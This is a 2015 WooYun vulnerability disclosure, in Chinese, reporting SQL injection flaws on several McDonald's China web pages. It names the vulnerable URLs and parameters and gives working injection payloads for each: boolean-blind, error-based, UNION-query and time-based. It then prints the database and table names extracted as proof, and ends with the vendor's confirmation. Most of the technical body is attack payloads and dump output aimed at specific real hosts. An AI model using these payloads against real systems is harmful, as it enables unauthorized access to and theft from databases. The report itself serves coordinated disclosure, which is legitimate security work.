当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-094206

漏洞标题:麦当劳多处SQL注入打包

相关厂商:麦当劳(中国)有限公司

漏洞作者: Mr.light

提交时间:2015-01-27 17:01

修复时间:2015-03-13 17:02

公开时间:2015-03-13 17:02

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:20

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:

漏洞详情

披露状态:

2015-01-27: 细节已通知厂商并且等待厂商处理中
2015-01-29: 厂商已经确认,细节仅向厂商公开
2015-02-08: 细节向核心白帽子及相关领域专家公开
2015-02-18: 细节向普通白帽子公开
2015-02-28: 细节向实习白帽子公开
2015-03-13: 细节向公众公开

简要描述:

吃了次麦当劳

详细说明:

对麦当劳进行次扫描,发现了多处SQL注入漏洞,直接打包列出来吧。
如下:
http://rl.mcdonalds.com.cn/rl/cid.php?pid=
http://www1.mcdonalds.com.cn/list/quality/index.php?DocTypeId=61
http://rl.mcdonalds.com.cn/rl/index.php?province=&city=&type2=&address=&range=&curpage=1
http://www1.mcdonalds.com.cn/list/quality/cid.php?DocTypeId=

Place: GET
Parameter: pid
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: pid=' AND 5109=5109 AND 'NysH'='NysH
    Type: error-based
    Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
    Payload: pid=' AND (SELECT 3550 FROM(SELECT COUNT(*),CONCAT(0x7165716871,(SE
LECT (CASE WHEN (3550=3550) THEN 1 ELSE 0 END)),0x7176706671,FLOOR(RAND(0)*2))x
FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND 'GtCQ'='GtCQ
    Type: UNION query
    Title: MySQL UNION query (NULL) - 8 columns
    Payload: pid=' UNION ALL SELECT CONCAT(0x7165716871,0x62664869745743486f6c,0
x7176706671),NULL,NULL,NULL,NULL,NULL,NULL,NULL#
    Type: AND/OR time-based blind
    Title: MySQL > 5.0.11 AND time-based blind
    Payload: pid=' AND SLEEP(5) AND 'PFWM'='PFWM


Place: GET
Parameter: DocTypeId
    Type: boolean-based blind
    Title: MySQL boolean-based blind - Parameter replace (MAKE_SET - original va
lue)
    Payload: DocTypeId=MAKE_SET(1992=1992,61)
    Type: error-based
    Title: MySQL >= 5.1 AND error-based - WHERE or HAVING clause (EXTRACTVALUE)
    Payload: DocTypeId=61 AND EXTRACTVALUE(7998,CONCAT(0x5c,0x71626f7871,(SELECT
 (CASE WHEN (7998=7998) THEN 1 ELSE 0 END)),0x716a6c6f71))


Place: GET
Parameter: province
    Type: boolean-based blind
    Title: MySQL >= 5.0 boolean-based blind - Parameter replace (original value)
    Payload: province=(SELECT (CASE WHEN (7049=7049) THEN '' ELSE 7049*(SELECT 7
049 FROM INFORMATION_SCHEMA.CHARACTER_SETS) END))&city=&type2=&address=&range=&c
urpage=1
    Type: error-based
    Title: MySQL >= 5.0 OR error-based - WHERE or HAVING clause
    Payload: province=-3519 OR (SELECT 4147 FROM(SELECT COUNT(*),CONCAT(0x716278
7971,(SELECT (CASE WHEN (4147=4147) THEN 1 ELSE 0 END)),0x7168766471,FLOOR(RAND(
0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)&city=&type2=&addres
s=&range=&curpage=1
    Type: UNION query
    Title: MySQL UNION query (random number) - 8 columns
    Payload: province=-9638 UNION ALL SELECT 8439,8439,8439,8439,CONCAT(0x716278
7971,0x524d6b74755453744c4a,0x7168766471),8439,8439,8439#&city=&type2=&address=&
range=&curpage=1
    Type: AND/OR time-based blind
    Title: MySQL > 5.0.11 OR time-based blind
    Payload: province=-1356 OR 8207=SLEEP(5)&city=&type2=&address=&range=&curpag
e=1

漏洞证明:

[*] information_schema
[*] mcdonalds_rl
[*] mcdonalds_rl_test
[*] mysql


+-----------------------------+
| admin_role                  |
| area                        |
| area_copy                   |
| faq                         |
| food                        |
| fooddocmanager              |
| foodstandard                |
| foodstandard_copy           |
| foodsupplier                |
| foodsupplier_copy           |
| foodsupplieranddoctypematch |
| foodsupplierchild           |
| foodsupplierchild_copy      |
| foodsupplierchild_copy1     |
| foodsupplierdoc             |
| foodsupplierdoc_copy        |
| foodsupplierdoc_copy1       |
| foodsupplierdoc_copy2       |
| foodsupplierdoc_copy3       |
| foodsupplierdoc_copy4       |
| foodsupplierdoc_copy5       |
| foodsupplierdoc_copy6       |
| foodsupplierdoc_copy7       |
| foodsupplierdocstyle        |
| foodsupplierdoctype         |
| foodsupplierdoctype_copy    |
| foodsupplierfile            |
| foodsuppliergroup           |
| foodsuppliergrouplist       |
| foodsuppliergrouplist_copy  |
| foodtype                    |
| log                         |
| mc_log                      |
| mc_mail_log                 |
| mc_mail_title               |
| mc_manager                  |
| mc_manager_suppliergroup    |
| mc_partner                  |
| mc_role                     |
| rl                          |
| rl2                         |
| rl_copy_20150111            |
| temp                        |
| temp1                       |
| temp2                       |
| temp3                       |
| temp4                       |
| temp5                       |
| temp52                      |
| temp6                       |
| temp7                       |
| temp8                       |
| temp9                       |
+-----------------------------+


Database: mysql
[23 tables]
+---------------------------+
| user                      |
| columns_priv              |
| db                        |
| event                     |
| func                      |
| general_log               |
| help_category             |
| help_keyword              |
| help_relation             |
| help_topic                |
| host                      |
| ndb_binlog_index          |
| plugin                    |
| proc                      |
| procs_priv                |
| servers                   |
| slow_log                  |
| tables_priv               |
| time_zone                 |
| time_zone_leap_second     |
| time_zone_name            |
| time_zone_transition      |
| time_zone_transition_type |
+---------------------------+


修复方案:

过滤

版权声明:转载请注明来源 Mr.light@乌云

漏洞回应

厂商回应:

危害等级:中

漏洞Rank:7

确认时间:2015-01-29 00:30

厂商回复:

网站存在SQL注入问题发现已久,由于采用托管模式,修复漏洞需要一定时间。

最新状态:

暂无